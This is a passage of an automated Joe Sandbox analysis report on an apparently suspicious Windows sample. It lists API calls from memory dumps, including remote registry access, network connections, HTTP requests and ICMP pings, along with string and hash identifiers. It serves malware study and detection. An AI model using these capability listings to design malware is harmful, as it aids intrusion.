                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 003184B7: _wcslen.LIBCMT ref: 003184CA
                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00371032
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0037104E
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0037106A
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00371094
                                                    • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 003710BC
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003710C7
                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 003710CC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 323675364-22481851
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003A499A
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003A49A1
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003A49B4
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003A49BC
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003A49C7
                                                    • DeleteDC.GDI32(00000000), ref: 003A49D1
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003A49DB
                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 003A49F1
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 003A49FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 003945B9
                                                    • CoInitialize.OLE32(00000000), ref: 003945E7
                                                    • CoUninitialize.OLE32 ref: 003945F1
                                                    • _wcslen.LIBCMT ref: 0039468A
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0039470E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00394832
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 0039486B
                                                    • CoGetObject.OLE32(?,00000000,003B0B64,?), ref: 0039488A
                                                    • SetErrorMode.KERNEL32(00000000), ref: 0039489D
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00394921
                                                    • VariantClear.OLEAUT32(?), ref: 00394935
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                    • String ID:
                                                    • API String ID: 429561992-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0038844D
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003884E9
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 003884FD
                                                    • CoCreateInstance.OLE32(003B0CD4,00000000,00000001,003D7E8C,?), ref: 00388549
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003885CE
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00388626
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 003886B1
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003886D4
                                                    • CoTaskMemFree.OLE32(00000000), ref: 003886DB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 00388730
                                                    • CoUninitialize.OLE32 ref: 00388736
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                    • String ID:
                                                    • API String ID: 2762341140-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0037033F
                                                    • SafeArrayAllocData.OLEAUT32(?), ref: 00370398
                                                    • VariantInit.OLEAUT32(?), ref: 003703AA
                                                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 003703CA
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0037041D
                                                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 00370431
                                                    • VariantClear.OLEAUT32(?), ref: 00370446
                                                    • SafeArrayDestroyData.OLEAUT32(?), ref: 00370453
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0037045C
                                                    • VariantClear.OLEAUT32(?), ref: 0037046E
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00370479
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 00312441: GetWindowLongW.USER32(00000000,000000EB), ref: 00312452
                                                    • GetSystemMetrics.USER32 ref: 003AA926
                                                    • GetSystemMetrics.USER32 ref: 003AA946
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 003AAB83
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003AABA1
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003AABC2
                                                    • ShowWindow.USER32(00000003,00000000), ref: 003AABE1
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 003AAC06
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003AAC29
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-3916222277
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00390F19
                                                    • inet_addr.WSOCK32(?), ref: 00390F79
                                                    • gethostbyname.WSOCK32(?), ref: 00390F85
                                                    • IcmpCreateFile.IPHLPAPI ref: 00390F93
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00391023
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00391042
                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00391116
                                                    • WSACleanup.WSOCK32 ref: 0039111C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00388BB1
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00388BC1
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00388BCD
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00388C6A
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388C7E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388CB0
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00388CE6
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00388CEF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local$System
                                                    • String ID: *.*
                                                    • API String ID: 1464919966-438819550
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateMenu.USER32 ref: 003A45D8
                                                    • SetMenu.USER32(?,00000000), ref: 003A45E7
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003A466F
                                                    • IsMenu.USER32 ref: 003A4683
                                                    • CreatePopupMenu.USER32 ref: 003A468D
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 003A46BA
                                                    • DrawMenuBar.USER32 ref: 003A46C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                    • String ID: 0$F
                                                    • API String ID: 161812096-3044882817
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 003727F4
                                                    • GetDlgCtrlID.USER32 ref: 003727FF
                                                    • GetParent.USER32 ref: 0037281B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037281E
                                                    • GetDlgCtrlID.USER32 ref: 00372827
                                                    • GetParent.USER32(?), ref: 0037283B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037283E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: f3023383e9b0e59d80cb58a8797947003d3854886f8b68a6e62f447dc28f31a2
                                                    • Instruction ID: 81c4036be57f1198311309e4c5a8817b2c318e0ed5d698829380a0043765164b
                                                    • Opcode Fuzzy Hash: f3023383e9b0e59d80cb58a8797947003d3854886f8b68a6e62f447dc28f31a2
                                                    • Instruction Fuzzy Hash: FD210771D00114BBCF1AEFA0DC85EEEBB78EF0A310F004156F965972A2CB795809CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                      • Part of subcall function 00374536: GetClassNameW.USER32 ref: 00374559
                                                    • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 003728D3
                                                    • GetDlgCtrlID.USER32 ref: 003728DE
                                                    • GetParent.USER32 ref: 003728FA
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 003728FD
                                                    • GetDlgCtrlID.USER32 ref: 00372906
                                                    • GetParent.USER32(?), ref: 0037291A
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037291D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 711023334-1403004172
                                                    • Opcode ID: e9c551449e3988c00ee870168d8a3592eb102630b5512e7f0609ba2215464e92
                                                    • Instruction ID: 33ede9490266a3faf8993b3d9fa5c18cf28d5ba88a0e7469f5ec5d90f1dabdec
                                                    • Opcode Fuzzy Hash: e9c551449e3988c00ee870168d8a3592eb102630b5512e7f0609ba2215464e92
                                                    • Instruction Fuzzy Hash: 2A210771900104BBCF27AFA0DC45EEEBBB8EF0A300F004046B995A71A1D7794859CB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A43FC
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A43FF
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003A4426
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A4449
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A44C1
                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 003A450B
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 003A4526
                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 003A4541
                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 003A4555
                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 003A4572
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow
                                                    • String ID:
                                                    • API String ID: 312131281-0
                                                    • Opcode ID: 2b7530a5e8fb3d1f19de5ccee1b8f2f6a193bc6f71f8b9724a60200f5a9db883
                                                    • Instruction ID: d75b9ca0fd9a4f77841f2af05503c9d5eaa1511d3972de921653730f56196676
                                                    • Opcode Fuzzy Hash: 2b7530a5e8fb3d1f19de5ccee1b8f2f6a193bc6f71f8b9724a60200f5a9db883
                                                    • Instruction Fuzzy Hash: 8D617E75900248AFDB22DFA4CC81EEE77B8EF4A310F104159FA14AB2A1D7B4AD45DF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038CBCF
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0038CBF7
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0038CC27
                                                    • GetLastError.KERNEL32 ref: 0038CC7F
                                                    • SetEvent.KERNEL32(?), ref: 0038CC93
                                                    • InternetCloseHandle.WININET(00000000), ref: 0038CC9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-3916222277
                                                    • Opcode ID: 1e39cc538332fdc3c84c7a7f6b5ab87302c5b2044f44ca0538e087024e540b33
                                                    • Instruction ID: 0d0cd3158cedf140af4675f3c7c04e0ac65cbad066861f9729217be6305d2cf7
                                                    • Opcode Fuzzy Hash: 1e39cc538332fdc3c84c7a7f6b5ab87302c5b2044f44ca0538e087024e540b33
                                                    • Instruction Fuzzy Hash: 7931CEB1510304AFD723AF65CD88AAB7BFCEB09740F10155EF44AD6600DB31D9059B70
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00355437,?,?,Bad directive syntax error,003ADCD0,00000000,00000010,?,?), ref: 0037A14B
                                                    • LoadStringW.USER32(00000000,?,00355437,?), ref: 0037A152
                                                      • Part of subcall function 0031B25F: _wcslen.LIBCMT ref: 0031B269
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0037A216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 858772685-4153970271
                                                    • Opcode ID: a12a0845cfe3da3f484a358ab240460575e675bd29fd80ae77ca86685655a5f9
                                                    • Instruction ID: 4bf8c4303809588d1959e5a4a8e2e6dfbff5d85098a79e36380aad894deb6c04
                                                    • Opcode Fuzzy Hash: a12a0845cfe3da3f484a358ab240460575e675bd29fd80ae77ca86685655a5f9
                                                    • Instruction Fuzzy Hash: 6F21B13280021EAFCF17AFD0DC06EEE7B79BF18304F044455F505690A2EB759A58DB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetParent.USER32 ref: 0037293B
                                                    • GetClassNameW.USER32 ref: 00372950
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003729DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_310000_itugx.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1290815626-3381328864
                                                    • Opcode ID: d536d249b16b57e5dfefbe4ea890ad164a9f0f40f81d644e240dd17684ddcb8a
                                                    • Instruction ID: 851c2a2ea1eabd843be5e850a5677406ee4584510ca0c4b00466f74433053583
                                                    • Opcode Fuzzy Hash: d536d249b16b57e5dfefbe4ea890ad164a9f0f40f81d644e240dd17684ddcb8a
                                                    • Instruction Fuzzy Hash: 1411E377644306BAFA232721EC07DFB779C8F06720F254013FA09E85E2EB65A8605554
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0038CADF
                                                    • GetLastError.KERNEL32 ref: 0038CAF2
                                                    • SetEvent.KERNEL32(?), ref: 0038CB06
                                                      • Part of subcall function 0038CBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0038CBCF
                                                      • Part of subcall function 0038CBB0: GetLastError.KERNEL32 ref: 0038CC7F
                                                      • Part of subcall function 0038CBB0: SetEvent.KERNEL32(?), ref: 0038CC93
                                                      • Part of subcall function 0038CBB0: InternetCloseHandle.WININET(00000000), ref: 0038CC9E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.411609286.0000000000311000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00310000, based on PE: true
                                                    • Associated: 00000002.00000002.411595645.0000000000310000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.411977225.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp
                                                    • Associated: 00000002.00000002.412020134.00000000003DD000.00000004.00000001.01000000.0000000A.sdmp
